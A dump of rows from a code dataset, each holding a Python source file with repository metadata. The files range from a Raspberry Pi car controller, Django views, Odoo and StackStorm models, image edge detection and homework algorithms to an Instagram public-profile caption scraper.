seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
70521198099 | #run code GPIOZERO_PIN_FACTORY=pigpio PIGPIO_ADDR=192.168.1.130 python3 test.py
# sudo pigpiod
from gpiozero import PWMLED
from time import sleep
from pynput import keyboard
forward = PWMLED(19)
reverse = PWMLED(13)
left = PWMLED(6)
right = PWMLED(5)
led = PWMLED(26)
speed = 1
steer = 1
def on_press(key):
try:
print('alphanumeric key {0} pressed'.format(
key.char))
except AttributeError:
print('special key {0} pressed'.format(
key))
if format(key) == 'Key.cmd':
forward.value = speed
elif format(key) == 'Key.alt':
reverse.value = speed
elif format(key) == 'Key.cmd' and format(key) == 'Key.alt_r':
forward.value = speed
left.value = steer
elif format(key) == 'Key.cmd' and format(key) == 'Key.cmd_r':
forward.value = speed
right.value = steer
elif format(key) == 'Key.alt' and format(key) == 'Key.alt_r':
reverse.value = speed
left.value = steer
elif format(key) == 'Key.alt' and format(key) == 'Key.cmd_r':
reverse.value = speed
right.value = steer
if format(key) == 'Key.alt_r':
left.value = steer
elif format(key) == 'Key.cmd_r':
right.value = steer
if format(key) == 'Key.shift':
led.value = 1
def on_release(key):
print('{0} released'.format(
key))
forward.value = 0
reverse.value = 0
left.value = 0
right.value = 0
#led.value = 0
if key == keyboard.Key.esc:
# Stop listener
return False
# Collect events until released
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
| Herant/piDrv | as-built/Test_files/manual_control.py | manual_control.py | py | 1,781 | python | en | code | 3 | github-code | 13 |
41831003929 | import numpy as np
import matplotlib.colors as colors
def hsv_distance(color1, color2):
"""
Converts RGB colors to HSV and computes the distance between them in
cartesian coords.
Args:
color1: Unnormalized RGB color 1 (0-255)
color2: Unnormalized RGB color 2 (0-255)
Returns:
cartesian distance in HSV space
"""
color1_cart = hsv_to_cart(rgb_to_hsv(color1))
color2_cart = hsv_to_cart(rgb_to_hsv(color2))
return np.linalg.norm(color1_cart - color2_cart)
def rgb_to_hsv(rgb):
"""
RGB (0-255) to normalized (0-1) HSV
Args:
rgb: RGB val
Returns:
normalized HSV value
"""
# normalize
rgb = rgb / 255.0
return colors.rgb_to_hsv(rgb)
def hsv_to_cart(hsv):
"""
HSV to cartesian conversion
Based on code from
https://github.com/UQ-METR4202/metr4202_ximea_ros/blob/main/ximea_color/src/ximea_color_detect.cpp
Args:
hsv: normalized HSV color
Returns:
"""
h = np.deg2rad(hsv[0])
s = hsv[1]
v = hsv[2]
x = v * s * np.cos(h)
y = v * s * np.sin(h)
z = v
return np.array([x, y, z])
| imwendi/METR4202-Team-14 | src/vision/color_utils.py | color_utils.py | py | 1,157 | python | en | code | 2 | github-code | 13 |
26413470492 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json
import sqlalchemy
import win32com.client as win32
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from coolscrapy.model import weekly, Base, engin, loadSession
class SomethingPipeline(object):
def __init__(self):
Base.metadata.create_all(engin)
app = 'Excel'
self.x1 = win32.gencache.EnsureDispatch('%s.Application' % app)
self.ss = self.x1.Workbooks.Add()
self.sh = self.ss.ActiveSheet
self.x1.Visible = True
self.session = loadSession()
self.i = 2
self.j = 5
def process_item(self,item,spider):
self.sh.Cells(self.j-1, 1).Value = "标题"
self.sh.Cells(self.j,1).Value = "URL连接"
self.sh.Cells(self.j + 1,1).Value = "内容简介"
#content = json.dumps(dict(item), ensure_ascii=False) + "\n"#生成一条json
if item['href'] and item['content'] is not None:
self.sh.Cells(self.j-1, self.i).Value = item['title']
self.sh.Cells(self.j - 1, self.i).Font.Bold=True
self.sh.Cells(self.j, self.i).Value = item['href']
self.sh.Cells(self.j + 1, self.i).Value =item['content']
self.i = self.i + 1
bean=weekly.weekly(href=str(item['href']),content=str(item['content']),title=str(item['title']))
self.session.add(bean)
self.session.commit()
if self.i>10:
self.i=2
self.j+=3
return item
def open_spider(self,spider):
pass
def close_spider(self,spider):
self.ss.Close(True)
self.x1.Application.Quit()
| Gaojunsu/coolscrapy | coolscrapy/pipelines.py | pipelines.py | py | 1,893 | python | en | code | 0 | github-code | 13 |
37657154014 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import cv2
import numpy as np
import scipy
from scipy.ndimage import convolve
from scipy import signal
# In[2]:
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.image as mpig
# In[3]:
blade=mpig.imread("C:/Users/Asus/Desktop/emma-watson.jpg")
# In[121]:
plt.imshow(blade)
# In[5]:
blade
# In[123]:
blade.shape
# #Luminosity Gray
# In[136]:
gray = lambda rgb : np.dot(rgb[... , :3] , [0.21,0.72,0.07])
gray= gray(blade)
gray=gray/(np.max(gray)/255)
# In[137]:
plt.imshow(gray,cmap='gray')
# In[102]:
gray
# In[103]:
blade2=blade.copy()
# # Average Gray
# In[104]:
gray2=(blade[:,:,0]+blade[:,:,1]+blade[:,:,2])/3
# In[105]:
plt.imshow(gray2)
# In[106]:
red=blade2[:,:,0]
plt.imshow(red,cmap=plt.get_cmap('gray'), vmin=0, vmax=255)
# In[107]:
green=blade2[:,:,1]
plt.imshow(green)
# In[108]:
blue=blade2[:,:,2]
plt.imshow(blue)
# In[109]:
(h,w,d)=blade.shape
# # Blurring
#
# In[8]:
Medianblur=np.asarray([[1,1,1],[1,1,1],[1,1,1]])/9
# In[9]:
conv=signal.convolve2d(gray,Medianblur,"same")
conv=conv/(np.max(conv)/255.0)# normalising
# In[10]:
plt.imshow(conv,cmap='gray')
# #Sobel operator
# In[11]:
sobelv=np.asarray([[-1,0,1],[-2,0,2],[-1,0,1]])
sobelh=sobelv.T
# In[12]:
edgeh=signal.convolve2d(conv,sobelh,"same")
# In[13]:
edgeh=edgeh/(np.max(edgeh)/255)
# # Horizontal edges
# In[14]:
plt.imshow(edgeh,cmap=plt.get_cmap('gray'))
# # Vertical Edges
# In[15]:
edgev=signal.convolve2d(conv,sobelv,"same")
edgev=edgev/(np.max(edgev)/255)
# In[16]:
plt.imshow(edgev,cmap='gray')
# In[20]:
type(edgev)
# In[21]:
edgev.shape
# In[17]:
edge=(edgeh**2+edgev**2)
# In[28]:
final=pow(edge,0.5)
# In[29]:
final=final/(np.max(final)/255)
# In[24]:
edgeh2=edgeh.astype(np.uint8)
# In[25]:
edgev2=edgev.astype(np.uint8)
# In[26]:
edge2=np.bitwise_or(edgeh2,edgev2)
# In[30]:
plt.imshow(final,cmap='gray')
# In[ ]:
# # Non max suppression
# In[33]:
def non_max_suppression(img, D):
M, N = img.shape
Z = np.zeros((M,N), dtype=np.int32)
angle = D * 180. / np.pi
angle[angle < 0] += 180
for i in range(1,M-1):
for j in range(1,N-1):
try:
q = 255
r = 255
#angle 0
if (0 <= angle[i,j] < 22.5) or (157.5 <= angle[i,j] <= 180):
q = img[i, j+1]
r = img[i, j-1]
#angle 45
elif (22.5 <= angle[i,j] < 67.5):
q = img[i+1, j-1]
r = img[i-1, j+1]
#angle 90
elif (67.5 <= angle[i,j] < 112.5):
q = img[i+1, j]
r = img[i-1, j]
#angle 135
elif (112.5 <= angle[i,j] < 157.5):
q = img[i-1, j-1]
r = img[i+1, j+1]
if (img[i,j] >= q) and (img[i,j] >= r):
Z[i,j] = img[i,j]
else:
Z[i,j] = 0
except IndexError as e:
pass
return Z
# In[34]:
m,n=edge.shape
# In[35]:
d = np.zeros((m,n), dtype=np.float32)
# In[36]:
import math
# In[85]:
for i in range(0,m):
for j in range(0,n):
if(edgeh[i,j]!=0):
d[i,j]=math.atan(edgev[i,j]/edgeh[i,j])
else:
d[i,j]=1.5708
# In[114]:
z=non_max_suppression(final,d)
# In[115]:
z=z/(np.max(z)/255)
# In[116]:
type(z)
# # Resultant Image
# In[117]:
plt.imshow(z,cmap='gray')
# # Applying thresholding to get more details and binarize
# In[138]:
for x in range(0, z.shape[0]):
for y in range(0, z.shape[1]):
if(z[x][y]>20):
z[x][y]=255
else:
z[x][y]=0.0
# In[139]:
plt.imshow(z,cmap='gray')
# In[ ]:
| Enish258/MLand-DL | Canny edge detection without opencv.py | Canny edge detection without opencv.py | py | 3,997 | python | en | code | 1 | github-code | 13 |
31237208189 | def homework_6(nodes): # 請同學記得把檔案名稱改成自己的學號(ex.1104813.py)
# 請使用 Prim Algorithms / Kruskal Algorithms
l = len(nodes)
lst = []
for i in range(l-1): #將座標點之間的距離算出來
for j in range(i+1, l):
path = abs(nodes[i][0]-nodes[j][0])+abs(nodes[i][1]-nodes[j][1]) #abs:絕對值
lst.append([i, j, path])
lst = sorted(lst, key=lambda x: x[2]) #按照距離由小到大排序
tree = dict() #建立dic用來記錄哪個點連接到哪一個
for i in range(l):
tree[i] = i
def find_node(x):
if tree[x]!=x:
tree[x]= find_node(tree[x])
return tree[x]
sum =0 #尋找最小路徑並加起來
l = l-1
for e in lst:
n1, n2, _ = e
if find_node(n1)!= find_node(n2):
tree[find_node(n2)] = find_node(n1)
sum += _
l-=1
if l ==0:
break
return sum
if __name__ == '__main__':
nodes = [[0,0],[2,6],[3,9],[6,4],[7,1]]
print(homework_6(nodes))
# 22
| daniel880423/Member_System | file/hw6/1100317/hw6_s1100317_0.py | hw6_s1100317_0.py | py | 1,123 | python | en | code | 0 | github-code | 13 |
31201073418 | import bson
import datetime
import mongoengine as me
import six
from st2common.util import mongoescape
from st2common.models.system.common import ResourceReference
__all__ = [
'StormFoundationDB',
'StormBaseDB',
'EscapedDictField',
'TagsMixin',
'TagField',
'ContentPackResourceMixin'
]
JSON_UNFRIENDLY_TYPES = (datetime.datetime, bson.ObjectId)
class StormFoundationDB(me.Document):
"""
Base abstraction for a model entity. This foundation class should only be directly
inherited from the application domain models.
"""
# ObjectIdField should be not have any constraints like required,
# unique etc for it to be auto-generated.
# TODO: Work out how we can mark this as a unique primary key.
id = me.ObjectIdField()
# see http://docs.mongoengine.org/guide/defining-documents.html#abstract-classes
meta = {
'abstract': True
}
def __str__(self):
attrs = list()
for k in sorted(self._fields.keys()):
v = getattr(self, k)
v = '"%s"' % str(v) if type(v) in [str, unicode, datetime.datetime] else str(v)
attrs.append('%s=%s' % (k, v))
return '%s(%s)' % (self.__class__.__name__, ', '.join(attrs))
def to_serializable_dict(self):
serializable_dict = {}
for k in sorted(six.iterkeys(self._fields)):
v = getattr(self, k)
v = str(v) if isinstance(v, JSON_UNFRIENDLY_TYPES) else v
serializable_dict[k] = v
return serializable_dict
class StormBaseDB(StormFoundationDB):
"""Abstraction for a user content model."""
name = me.StringField(required=True, unique=True)
description = me.StringField()
# see http://docs.mongoengine.org/guide/defining-documents.html#abstract-classes
meta = {
'abstract': True
}
class EscapedDictField(me.DictField):
def to_mongo(self, value):
value = mongoescape.escape_chars(value)
return super(EscapedDictField, self).to_mongo(value)
def to_python(self, value):
value = super(EscapedDictField, self).to_python(value)
return mongoescape.unescape_chars(value)
def validate(self, value):
if not isinstance(value, dict):
self.error('Only dictionaries may be used in a DictField')
if me.fields.key_not_string(value):
self.error("Invalid dictionary key - documents must have only string keys")
me.base.ComplexBaseField.validate(self, value)
class EscapedDynamicField(me.DynamicField):
def to_mongo(self, value):
value = mongoescape.escape_chars(value)
return super(EscapedDynamicField, self).to_mongo(value)
def to_python(self, value):
value = super(EscapedDynamicField, self).to_python(value)
return mongoescape.unescape_chars(value)
class TagField(me.EmbeddedDocument):
"""
To be attached to a db model object for the purpose of providing supplemental
information.
"""
name = me.StringField(max_length=1024)
value = me.StringField(max_length=1024)
class TagsMixin(object):
"""
Mixin to include tags on an object.
"""
tags = me.ListField(field=me.EmbeddedDocumentField(TagField))
@classmethod
def get_indices(cls):
return ['tags.name', 'tags.value']
class ContentPackResourceMixin(object):
"""
Mixin class which provides utility methods for models which contain
a "pack" attribute.
"""
def get_reference(self):
"""
Retrieve referene object for this model.
:rtype: :class:`ResourceReference`
"""
ref = ResourceReference(pack=self.pack,
name=self.name)
return ref
| gtmanfred/st2 | st2common/st2common/models/db/stormbase.py | stormbase.py | py | 3,727 | python | en | code | null | github-code | 13 |
10053191967 | # -*- encoding: utf-8 -*-
import re
from datetime import date, datetime
from decimal import Decimal
from django import template
from django.conf import settings
from django.template import defaultfilters
from django.utils.encoding import force_text
from django.utils.formats import number_format
from django.utils.safestring import mark_safe
from django.utils.timezone import is_aware, utc
from django.utils.translation import pgettext, ugettext as _, ungettext
register = template.Library()
# A tuple of standard large number to their converters
# 1,809,379,782.37
#
intword_converters = (
(12, lambda number: (
ungettext('%(value).2f 万亿', '%(value).2f 万亿', number),
ungettext('%(value)s 万亿', '%(value)s 万亿', number),
)),
(8, lambda number: (
ungettext('%(value).2f 亿', '%(value).2f 亿', number),
ungettext('%(value)s 亿', '%(value)s 亿', number),
)),
(7, lambda number: (
ungettext('%(value).2f 千万', '%(value).2f 千万', number),
ungettext('%(value)s 千万', '%(value)s 千万', number),
)),
(6, lambda number: (
ungettext('%(value).2f 百万', '%(value).2f 百万', number),
ungettext('%(value)s 百万', '%(value)s 百万', number),
)),
(4, lambda number: (
ungettext('%(value).2f 万', '%(value).2f 万', number),
ungettext('%(value)s 万', '%(value)s 万', number),
)),
)
@register.filter(is_safe=False)
def money_display(value):
"""
Converts a large integer to a friendly text representation. Works best
for numbers over 1 million. For example, 1000000 becomes '1.0 million',
1200000 becomes '1.2 million' and '1200000000' becomes '1.2 billion'.
"""
original_value = value
if value:
abs_value = abs(value)
value = Decimal(value)
if abs_value < 10000:
if '.' in str(value) and len(str(value).split('.')[-1]) > 3:
value = value.quantize(Decimal('0.01'))
return value
try:
value = int(value)
except (TypeError, ValueError):
return value
if abs(value) < 10000:
return original_value
def _check_for_i18n(value, float_formatted, string_formatted):
"""
Use the i18n enabled defaultfilters.floatformat if possible
"""
if settings.USE_L10N:
value = defaultfilters.floatformat(value, 2)
template = string_formatted
else:
template = float_formatted
return template % {'value': value}
for exponent, converters in intword_converters:
large_number = 10 ** exponent
if abs(value) > large_number:
new_value = value / float(large_number)
return _check_for_i18n(new_value, *converters(new_value))
return value
| fruitschen/fruits_learning | stocks/templatetags/money.py | money.py | py | 2,823 | python | en | code | 1 | github-code | 13 |
19628992003 | from django.shortcuts import render
from django.http import HttpResponse
from datetime import datetime
from django.template import Template, Context, loader
from appvet.models import *
from appvet.forms import *
# Create your views here.
#vista de la pagina inicio
def vista_inicio(request):
return render(request, "appvet/inicio.html")
#CLIENTES-------------------------------------------------------------------------
def vista_clientes(request):
clientes = Cliente.objects.all()
return render(request, "appvet/clientes.html", {"cliente":clientes})
def vista_crear_cliente(request):
if request.method == "POST":
formulario = ClienteFormulario(request.POST)
#validamos que el formulario no tenga problemas
if formulario.is_valid():
#recuperamos los datos del atributo cleaned_data
data = formulario.cleaned_data
cliente = Cliente(nombre = data["nombre"], telefono = data["telefono"])
cliente.save()
formulario = ClienteFormulario()
contexto = {"formulario": formulario}
return render(request, "appvet/crear_cliente.html", contexto)
# MASCOTAS-------------------------------------------------------------------------
def vista_mascotas(request):
mascotas = Mascota.objects.all()
return render(request, "appvet/mascotas.html", {"mascota":mascotas})
def vista_crear_mascota(request):
if request.method == "POST":
formulario = MascotaFormulario(request.POST)
#validamos que el formulario no tenga problemas
if formulario.is_valid():
#recuperamos los datos del atributo cleaned_data
data = formulario.cleaned_data
mascota = Mascota(nombre = data["nombre"], especie = data["especie"], raza = data["raza"], edad = data["edad"])
mascota.save()
formulario = MascotaFormulario()
contexto = {"formulario": formulario}
return render(request, "appvet/crear_mascota.html",contexto)
# PRODUCTOS-------------------------------------------------------------------------
def vista_productos(request):
productos = Producto.objects.all()
return render(request, "appvet/productos.html", {"producto":productos})
def vista_crear_producto(request):
if request.method == "POST":
formulario = ProductoFormulario(request.POST)
#validamos que el formulario no tenga problemas
if formulario.is_valid():
#recuperamos los datos del atributo cleaned_data
data = formulario.cleaned_data
producto = Producto(tipo = data["tipo"], marca = data["marca"], precio = data["precio"])
producto.save()
formulario = ProductoFormulario()
contexto = {"formulario": formulario}
return render(request, "appvet/crear_producto.html", contexto)
# BUSCADOR-------------------------------------------------------------------------
def vista_buscador(request):
if request.GET:
tipo = Producto.objects.filter(tipo__icontains = request.GET["tipo"])
return render(request, "appvet/buscador.html", {"tipo": tipo})
return render(request, "appvet/buscador.html", {"tipo":[]}) | ClEsteban/Entrega1Esteban | Entrega1Esteban/appvet/views.py | views.py | py | 3,152 | python | es | code | 0 | github-code | 13 |
42138462777 | import numpy as np
class Checkerboard:
def __init__(self):
self.state = np.zeros((3, 3), dtype=int)
self.is_live = True
def update(self, coordinates, player):
(i, j) = coordinates
self.state[i - 1, j - 1] = player
# check if game now over
diagonal_1 = self.state[0, 0] * self.state[1, 1] * self.state[2, 2]
diagonal_2 = self.state[2, 0] * self.state[1, 1] * self.state[0, 2]
rows = self.state.prod(axis=0)
cols = self.state.prod(axis=1)
diags = [diagonal_1, diagonal_2]
lines = [*rows, *cols, *diags]
# a straight line of o's <=> state 1, 1, 1 <=> product = 1
# straigt line of x's <=> state 2, 2, 2 <=> product = 8
# full board <=> product != 0
if 1 in lines or 8 in lines or self.state.prod() != 0:
self.is_live = False
def print(self):
np_state = self.state
str_lkup = {0: ' ',
1: 'o',
2: 'x'}
str_state = [[str_lkup[np_state[i, j]] for j in range(len(np_state[i]))] for i in range(len(np_state))]
if self.is_live:
print('This game is live')
else:
print('This game is over')
for i in range(len(str_state)):
print(*str_state[i], sep='|')
if i < 2:
print('-+-+-')
else:
print()
| DanielBraddock/toe-tac-tic | checkerboards.py | checkerboards.py | py | 1,281 | python | en | code | 0 | github-code | 13 |
31492559127 | from django.contrib.auth import authenticate, login, logout, get_user_model
from django.db import IntegrityError
from rest_framework import status, viewsets, permissions
from rest_framework.views import APIView
from rest_framework.decorators import action
from rest_framework.response import Response
from user.serializers import UserSerializer, UserLoginSerializer, UserCreateSerializer, ParticipantSerializer, InstructorSerializer
from user.models import ParticipantProfile, InstructorProfile
User = get_user_model()
class UserSignUpView(APIView):
permission_classes = (permissions.AllowAny, )
# POST /api/v1/signup/
# Request Body : username, password, email, role, (university, accepted), (company, year)
def post(self, request, *args, **kwargs):
role = request.data.get('role')
if role != "participant" and role != "instructor":
return Response(status=status.HTTP_400_BAD_REQUEST, data='올바르지 않은 역할입니다.')
serializer = UserCreateSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
try:
user, jwt_token = serializer.save()
except IntegrityError:
return Response(status=status.HTTP_409_CONFLICT, data='이미 존재하는 유저 이메일입니다.')
if role == "participant":
true = ['t', 'T', 'y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE', 'on', 'On', 'ON', '1', 1, True]
false = ['f', 'F', 'n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE', 'off', 'Off', 'OFF', '0', 0, 0.0, False]
university = request.data.get('university', '')
accepted = request.data.get('accepted', True)
if accepted in true:
accepted = True
if accepted in false:
accepted = False
user.participant = ParticipantProfile.objects.create(university=university, accepted=accepted)
user.save()
if role == "instructor":
company = request.data.get('company', '')
year = request.data.get('year')
if year and not (year.isdigit() and int(year) > 0):
return Response(status=status.HTTP_400_BAD_REQUEST, data='올바르지 않은 연도 형식입니다.')
user.instructor = InstructorProfile.objects.create(company=company, year=int(year))
user.save()
return Response({'user': user.email, 'token': jwt_token}, status=status.HTTP_201_CREATED)
class UserLoginView(APIView):
permission_classes = (permissions.AllowAny, )
# POST /api/v1/login/
def post(self, request):
serializer = UserLoginSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
token = serializer.validated_data['token']
return Response({'success': True, 'token': token}, status=status.HTTP_200_OK)
class UserViewSet(viewsets.GenericViewSet):
permission_classes = (permissions.IsAuthenticated, )
serializer_class = UserSerializer
queryset = User.objects.all()
# PUT /api/v1/user/me/ : 수정
# Request Body : (university), (company, year)
def update(self, request, pk=None):
if pk != 'me':
return Response(status=status.HTTP_403_FORBIDDEN, data='다른 유저 정보를 수정할 수 없습니다.')
if request.user.is_anonymous:
return Response(status=status.HTTP_403_FORBIDDEN, data='먼저 로그인 하세요.')
user = request.user
data = request.data.copy()
data.pop('accepted', None)
serializer = self.get_serializer(user, data=data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.update(user, serializer.validated_data)
if user.participant:
serializer = ParticipantSerializer(user.participant, data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
if user.instructor:
year = data.get('year')
if year and not (year.isdigit() and int(year) > 0):
return Response(status=status.HTTP_400_BAD_REQUEST, data='올바르지 않은 연도 형식입니다.')
data['year'] = int(year)
serializer = InstructorSerializer(user.instructor, data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(status=status.HTTP_200_OK)
# GET /api/v1/user/{user_id}/ : 조회
def retrieve(self, request, pk=None):
if request.user.is_anonymous:
return Response(status=status.HTTP_403_FORBIDDEN, data='먼저 로그인 하세요.')
user = request.user if pk == 'me' else self.get_object()
return Response(self.get_serializer(user).data)
# POST /api/v1/user/participant/ : 참여자 등록
# Request Body : university, accepted
@action(detail=False, methods=['POST'])
def participant(self, request):
if request.user.is_anonymous:
return Response(status=status.HTTP_403_FORBIDDEN, data='먼저 로그인 하세요.')
user = request.user
if user.participant:
return Response(status=status.HTTP_400_BAD_REQUEST, data='이미 참여자로 지정되었습니다.')
true = ['t', 'T', 'y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE', 'on', 'On', 'ON', '1', 1, True]
false = ['f', 'F', 'n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE', 'off', 'Off', 'OFF', '0', 0, 0.0, False]
university = request.data.get('university', '')
accepted = request.data.get('accepted', True)
if accepted in true:
accepted = True
if accepted in false:
accepted = False
user.participant = ParticipantProfile.objects.create(university=university, accepted=accepted)
user.save()
return Response(self.get_serializer(user).data, status=status.HTTP_201_CREATED)
| xxnpark/snucse | Waffle Studio/Django/Seminar 2/waffle_backend/user/views.py | views.py | py | 5,942 | python | en | code | 0 | github-code | 13 |
12805885013 | day_of_week = input("Enter a day:").lower()
if day_of_week == "monday":
print("Monday")
elif day_of_week == "tuesday":
print("Tuesday")
else:
print("Not Monday")
friends = ["Ross", "Taylor", "Joe"]
#if "Joe" in friends:
if "Joe" in {"Kabir","Aziz","Asma"}:
print("Joe is present")
else:
print("Absent")
search = input("What do you wanna search?")
while search in friends:
print("Present")
search = input("Do you wanna check someone else")
#for friend in friends:
for friend in range(4):
print(f"{friend} is my friend") | hyderdanyal/udemyPython | python basics/loops.py | loops.py | py | 554 | python | en | code | 0 | github-code | 13 |
28765910654 | def gcd(a, b):
while a>0:
if a<b: a, b = b, a
a = int(a%b)
return b
for i in range(int(input())):
s = input()
r = s[::-1]
if gcd(int(s), int(r)) == 1: print("YES")
else: print("NO") | CuongNguyen291201/py | sodaonguyentocungnhau.py | sodaonguyentocungnhau.py | py | 223 | python | en | code | 0 | github-code | 13 |
14680820288 | import numpy as np
from lmfit.lineshapes import gaussian
from lmfit.models import Model
class Stepper:
def __init__(self, start, stop, npts):
self.start = start
self.stop = stop
self.npts = npts
def get_x(self):
return np.linspace(self.start, self.stop, self.npts)
def gaussian_mod(obj, amplitude, center, sigma):
return gaussian(obj.get_x(), amplitude, center, sigma)
def test_custom_independentvar():
"""Tests using a non-trivial object as an independent variable."""
npts = 501
xmin = 1
xmax = 21
cen = 8
obj = Stepper(xmin, xmax, npts)
y = gaussian(obj.get_x(), amplitude=3.0, center=cen, sigma=2.5)
y += np.random.normal(scale=0.2, size=npts)
gmod = Model(gaussian_mod)
params = gmod.make_params(amplitude=2, center=5, sigma=8)
out = gmod.fit(y, params, obj=obj)
assert out.nvarys == 3
assert out.nfev > 10
assert out.chisqr > 1
assert out.chisqr < 100
assert out.params['sigma'].value < 3
assert out.params['sigma'].value > 2
assert out.params['center'].value > xmin
assert out.params['center'].value < xmax
assert out.params['amplitude'].value > 1
assert out.params['amplitude'].value < 5
| lmfit/lmfit-py | tests/test_custom_independentvar.py | test_custom_independentvar.py | py | 1,235 | python | en | code | 948 | github-code | 13 |
4474465522 | # -*- coding: utf-8 -*-
from odoo import fields, models, api, _
class AccountCashboxLine(models.Model):
""" We add dynamic currency """
_inherit = 'account.cashbox.line'
# def _get_default_currency(self):
# currency_id = self.cashbox_id.currency_id
# if self.payment_method_id:
# currency_id = self.payment_method_id.cash_journal_id.currency_id \
# or self.payment_method_id.cash_journal_id.company_id.currency_id
# return currency_id
payment_method_id = fields.Many2one("pos.payment.method", _("Payment method"),
domain="[('is_cash_count', '=', True)]")
currency_id = fields.Many2one("res.currency", compute='_compute_currency_id', store=True)
cashbox_currency_id = fields.Many2one('res.currency', related='cashbox_id.currency_id')
converted_amount = fields.Monetary(compute='_compute_converted_amount', string='Amount currency', digits=0,
readonly=True, currency_field='cashbox_currency_id')
@api.model
def create(self, vals):
""" Computed currency """
cashbox_line_ids = super().create(vals)
cashbox_line_ids.compute_currency()
return cashbox_line_ids
def compute_currency(self):
""" Compute the currency """
for cashbox_line in self:
if cashbox_line.payment_method_id:
currency_id = cashbox_line.payment_method_id.cash_journal_id.currency_id \
or cashbox_line.payment_method_id.cash_journal_id.company_id.currency_id
cashbox_line.currency_id = currency_id
else:
cashbox_line.currency_id = cashbox_line.cashbox_id.currency_id
def recompute_converted_amount(self):
""" Re Compute the converted currency """
self.compute_currency()
for cashbox_line in self:
cashbox_line.converted_amount = cashbox_line.currency_id.compute(cashbox_line.subtotal, cashbox_line.cashbox_id.currency_id) or 0.0
@api.onchange("payment_method_id")
def _onchange_payment_method_id(self):
self.compute_currency()
@api.depends("payment_method_id")
def _compute_currency_id(self):
self.compute_currency()
@api.depends("currency_id", 'subtotal')
def _compute_converted_amount(self):
self.recompute_converted_amount()
class AccountBankStmtCashWizard(models.Model):
"""
Account Bank Statement popup that allows entering cash details.
"""
_inherit = 'account.bank.statement.cashbox'
@api.depends('cashbox_lines_ids')
def _recompute_line_ids_currencies(self):
for cashbox in self:
cashbox.cashbox_lines_ids.compute_currency()
@api.depends('cashbox_lines_ids', 'cashbox_lines_ids.coin_value', 'cashbox_lines_ids.number')
def _compute_total(self):
for cashbox in self:
cashbox.cashbox_lines_ids.compute_currency()
current_currency_id = self.currency_id
cashbox.total = sum([line.currency_id.compute(from_amount=line.subtotal, to_currency=current_currency_id)
for line in cashbox.cashbox_lines_ids])
| LuisMalave2001/GarryTesting | pos_pr/models/account_bank_statement.py | account_bank_statement.py | py | 3,230 | python | en | code | 2 | github-code | 13 |
13176295330 | try:
# import argparse
import json
import requests
except ModuleNotFoundError:
print("Please download dependencies from requirement.txt")
except Exception as ex:
print(ex)
def clean_non_utf8_chars(input_data):
if isinstance(input_data, str):
# If the input is a string, clean it and return the cleaned string
cleaned_string = ""
for char in input_data:
if ord(char) < 128:
cleaned_string += char
else:
cleaned_string += ' '
return cleaned_string
elif isinstance(input_data, dict):
# If the input is a dictionary, recursively clean its values
cleaned_dict = {}
for key, value in input_data.items():
cleaned_value = clean_non_utf8_chars(value)
cleaned_dict[key] = cleaned_value
return cleaned_dict
elif isinstance(input_data, list):
# If the input is a list, recursively clean its elements
cleaned_list = []
for item in input_data:
cleaned_item = clean_non_utf8_chars(item)
cleaned_list.append(cleaned_item)
return cleaned_list
else:
# For other data types, return as is
return input_data
'''can scrap only public instagram accounts'''
class Instagram:
@staticmethod
def build_param(username):
params = {
'username': username,
}
return params
@staticmethod
def build_headers(username):
return {
'authority': 'www.instagram.com',
'accept': '*/*',
'accept-language': 'en-US,en;q=0.9',
'referer': f'https://www.instagram.com/{username}/',
'sec-ch-prefers-color-scheme': 'dark',
'sec-ch-ua': '"Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'x-asbd-id': '198387',
'x-csrftoken': 'VUm8uVUz0h2Y2CO1SwGgVAG3jQixNBmg',
'x-ig-app-id': '936619743392459',
'x-ig-www-claim': '0',
'x-requested-with': 'XMLHttpRequest',
}
@staticmethod
def make_request(url, params, headers, proxy=None):
response = None
if proxy:
proxy_dict = {
'http': f'http://{proxy}',
'https': f'http://{proxy}'
}
response = requests.get(
url, headers=headers, params=params, proxies=proxy_dict)
else:
response = requests.get(
url, headers=headers, params=params)
return response
@staticmethod
def scrap_profile(username, proxy = None):
try:
headers = Instagram.build_headers(username)
params = Instagram.build_param(username)
response = Instagram.make_request('https://www.instagram.com/api/v1/users/web_profile_info/',
headers=headers, params=params, proxy=proxy)
if response.status_code == 200:
profile_data = response.json()['data']['user']
return json.dumps(profile_data)
else:
print('Error : ', response.status_code, response.text)
except Exception as ex:
print(ex)
def main(username):
d = Instagram.scrap_profile(username)
if d is None:
return
data = json.loads(d)
print(d)
# print(type(Instagram.scrap_tagged(args.username, args.proxy)))
# data1 = json.loads(Instagram.scrap_tagged(args.username, args.proxy))
# print(data1)
# # print(type(data))
cleaned_json_data = clean_non_utf8_chars(data)
a = cleaned_json_data["edge_owner_to_timeline_media"]["edges"]
str_data = ""
for i in range(len(a)):
b = a[i]
c = b["node"]["edge_media_to_caption"]["edges"]
for j in range(len(c)):
d = c[j]
e = d["node"]["text"]
# print(e)
str_data += e
return str_data
# file_path = "tech_data.txt"
# with open(file_path, "w") as file:
# # file.write("\nSTART\n")
